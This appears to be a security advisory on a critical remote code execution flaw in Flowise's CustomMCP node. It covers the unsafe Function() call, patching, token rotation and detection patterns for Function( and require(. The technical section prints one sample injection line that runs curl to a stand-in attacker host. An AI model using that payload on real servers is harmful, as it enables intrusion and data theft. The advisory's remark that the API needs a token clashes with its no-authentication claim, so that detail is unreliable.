CVE-2025-59528 – Critical Remote Code Execution in Flowise AI Agent Builder

TL;DR

  • Critical RCE in Flowise 3.0.5 (CVSS 10.0).
  • Unsafe Function() call in the CustomMCP node lets attackers execute arbitrary JavaScript with full Node.js privileges.
  • Active exploitation reported since early April 2026; >12 k public instances exposed.
  • Immediate patch to 3.0.6 or disable the CustomMCP node.
  • Monitor for suspicious process creation and API‑token abuse.

Overview

Flowise is a drag‑and‑drop UI that lets developers build customized large‑language‑model (LLM) workflows. In version 3.0.5 a critical remote code execution flaw—tracked as CVE-2025-59528—was introduced in the CustomMCP node. The flaw allows an attacker who can supply a malicious mcpServerConfig string to have that string evaluated by the JavaScript Function() constructor, executing arbitrary code with the full privileges of the Flowise server process.

Threat intelligence shows the first exploitation attempts on 2026‑04‑06, with a sharp spike of 42 active‑exploitation reports on 2026‑04‑07. Over the following two weeks, more than 78 mentions of the vulnerability were recorded, including multiple PoC releases and public exploit tools. Analysts estimate that 12 000 – 15 000 Flowise instances are exposed on the internet, making the vulnerability a high‑value target for ransomware, cryptomining, and data‑exfiltration campaigns.

Live signal counts, exploit timelines, and indicator trends are visualised on the VulnSocial CVE page.


Technical Details

The vulnerable code lives in CustomMCP.ts. The function convertToValidJSONString builds a configuration object by directly evaluating the user‑provided string:

function convertToValidJSONString(mcpServerConfig) {
  // Unsafe: evaluates user‑supplied string as JavaScript
  return new Function(`return ${mcpServerConfig}`)();
}

Because Function() compiles and runs the supplied text as JavaScript, an attacker can inject payloads such as:

require('child_process').execSync('curl http://attacker.com/$(whoami)');

The code runs in the same Node.js runtime that hosts Flowise, giving access to core modules like child_process, fs, and net. When the attacker supplies the malicious mcpServerConfig via the Flowise API (which authenticates only with an API token), the server executes the payload without any sandboxing or validation.

The vulnerability is exploitable remotely over the network (AV:N) and requires no additional privileges (PR:N). The flaw is in the scope of the component (S:C), meaning a successful exploit results in full system compromise (C:H/I:H/A:H).


Severity & Impact

MetricValue
CVSSCVSS 10.0
VectorAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
SeverityCritical
CWECWE‑94

The CVSS vector reflects a network‑only attack that requires no authentication, no user interaction, and leads to complete confidentiality, integrity, and availability loss.


Affected Products

  • FlowiseAI Flowise 3.0.5 (all deployments using the CustomMCP node).
  • The issue is fixed in Flowise 3.0.6.

For a complete list of affected versions and CPE identifiers, see the VulnSocial CVE page.


Actionable Insights / What to Do

  • Patch: Upgrade every Flowise instance to version 3.0.6 or later.
  • Disable the CustomMCP node if it is not required for your workflows.
  • Sanitize any mcpServerConfig input: enforce strict JSON schema, reject strings containing Function(, require(, or other code patterns.
  • Rotate all Flowise API tokens and apply least‑privilege scopes.
  • Monitor Node.js process creation events (e.g., child_process.exec*) and audit logs for unexpected command execution.
  • Network‑segment Flowise services; restrict inbound traffic to trusted IP ranges.
  • Deploy WAF/IPS signatures that block payloads containing the Function( constructor or suspicious JavaScript snippets.
  • Conduct regular vulnerability scans to confirm the removal of the vulnerable code path.

Remediation & Mitigation

  1. Identify the installed version:
    flowise --version
    
  2. Download the patched release 3.0.6 from the official repository:
    git checkout tags/flowise%403.0.6
    
    (Reference: https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6)
  3. Install the update and restart the Flowise service.
  4. If immediate upgrade is impossible, remove or disable the CustomMCP node configuration in CustomMCP.ts and replace the Function() call with a safe JSON parser.
  5. Regenerate all API tokens; invalidate any previously issued tokens.
  6. Enable detailed request logging for the /nodes endpoint and set alerts for payloads containing Function( or require(.
  7. Validate the remediation by attempting to send a malicious mcpServerConfig payload; the server should reject it with a validation error.

Bottom Line

CVE-2025-59528 is a Critical remote code execution flaw in Flowise 3.0.5 that is being actively exploited in the wild. The vulnerability stems from an unchecked Function() call that executes attacker‑controlled JavaScript with full system privileges. Upgrade to Flowise 3.0.6 immediately, enforce strict input validation, rotate API tokens, and monitor for abnormal process activity to mitigate the risk.


References


#CVE #CVE202559528 #Critical #RCE #Flowise #AI #Vulnerability